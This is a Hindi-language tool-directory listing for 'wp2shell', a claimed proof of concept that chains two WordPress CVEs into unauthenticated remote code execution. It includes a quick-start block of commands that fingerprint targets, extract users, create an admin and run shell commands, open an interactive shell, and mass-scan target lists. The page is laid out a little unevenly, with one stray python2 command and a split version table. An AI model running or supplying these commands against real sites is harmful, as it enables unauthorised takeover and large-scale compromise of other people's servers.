Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wp2shell — wp2shell - WordPress RCE और PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
उपकरण/GitHubGitHub/johenlastgen-jlg/wp2shell
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress RCE और PoC (CVE-2026-63030 + CVE-2026-60137)

रिपॉजिटरी देखें
21111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

wp2shell - WordPress RCE PoC (CVE-2026-63030 + CVE-2026-60137)

WordPress कोर में अनप्रमाणित रिमोट कोड एक्ज़ीक्यूशन (Unauthenticated Remote Code Execution)

द्वारा: JohenLastGen


📌 अवलोकन

यह उपकरण दो महत्वपूर्ण WordPress कमजोरियों को जोड़कर अनप्रमाणित RCE प्राप्त करता है:

VulnerabilityCVEDescription
REST Batch Route ConfusionCVE-2026-63030मान्यता को बायपास करता है, SQLi पेलोड तस्करी करता है
WP_Query author__not_in SQLiCVE-2026-60137कच्चा स्ट्रिंग इंजेक्शन → SQL निष्पादन

प्रभाव: अनप्रमाणित हमलावर → व्यवस्थापक बनाएं → कमांड निष्पादित करें


🎯 प्रभावित संस्करण

Version RangeStatus
WordPress 6.9.0 - 6.9.4✅ कमजोर (पूर्ण RCE श्रृंखला)

🚀 त्वरित प्रारंभ

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
टूल डाउनलोड करें
WordPress 7.0.0 - 7.0.1
✅ कमजोर (पूर्ण RCE श्रृंखला)
WordPress 6.8.0 - 6.8.5⚠️ केवल SQLi (सहायक प्लगइन की आवश्यकता)
WordPress 6.9.5, 7.0.2+❌ पैच किया गया